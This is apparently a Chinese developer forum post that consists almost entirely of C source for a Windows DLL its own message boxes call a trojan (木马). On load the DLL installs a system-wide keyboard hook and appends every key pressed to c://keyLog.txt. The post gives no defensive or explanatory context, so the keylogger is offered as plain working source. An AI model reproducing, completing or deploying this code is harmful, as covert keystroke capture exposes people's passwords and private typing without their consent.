15,471
社区成员
发帖
与我相关
我的任务
分享
#include <windows.h>
#ifdef __cplusplus
#define DLLEXPORT extern "C" __declspec (dllexport)
#else
#define DLLEXPORT __declspec (dllexport)
#endif
DLLEXPORT int CALLBACK StartHook();
DLLEXPORT int CALLBACK StopHook();
#include <stdio.h>
#include "hook_dll.h"
#pragma data_seg("mydata")
FILE *fp = NULL;
int num = 0;
HHOOK glhHookKey = NULL;
HINSTANCE glhInstance=NULL;
#pragma data_seg()
#pragma comment(linker,"/section:mydata,rws")
LRESULT CALLBACK KeyProc(int nCode,WPARAM wParam,LPARAM lParam);
BOOL APIENTRY DllMain( HINSTANCE hInstance,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
glhInstance = hInstance;
StartHook();
MessageBox(NULL,"木马注入","木马",MB_OK);
break;
case DLL_PROCESS_DETACH:
MessageBox(NULL,"木马离去","木马",MB_OK);
StopHook();
break;
}
return TRUE;
}
DLLEXPORT int CALLBACK StartHook()
{
int num=0;
if(glhHookKey != NULL)
{
return 0;
}
glhHookKey = SetWindowsHookEx(WH_KEYBOARD,KeyProc,glhInstance,0);
{
fp = fopen("c://keyLog.txt","at+");
if(fp != NULL)
{
fprintf(fp,"\nKey Record start.\n");
fclose(fp);
}
else
{
MessageBox(NULL,"open file err",0,0);
StopHook();
return 1;
}
return 0;
}
}
DLLEXPORT int CALLBACK StopHook()
{
BOOL bResult=false;
if(glhHookKey)
{
bResult = UnhookWindowsHookEx(glhHookKey);
fp = fopen("c://keyLog.txt","at+");
if(fp != NULL)
{
fprintf(fp,"\nKey Record stop.\n");
fclose(fp);
}
glhHookKey = NULL;
}
return bResult;
}
LRESULT CALLBACK KeyProc(int nCode,WPARAM wParam,LPARAM lParam)
{
if(nCode < 0 || nCode == HC_NOREMOVE)
return ::CallNextHookEx(glhHookKey, nCode, wParam, lParam);
if(lParam & 0x40000000)
{
return ::CallNextHookEx(glhHookKey, nCode, wParam, lParam);
}
char szKey[80];
::GetKeyNameText(lParam, szKey, 80);
MessageBox(NULL,szKey,"木马",MB_OK);
fp = fopen("c://keyLog.txt","at+");
if(fp != NULL)
{
fprintf(fp,"%s",szKey);
fclose(fp);
}
return CallNextHookEx(glhHookKey,nCode,wParam,lParam);
}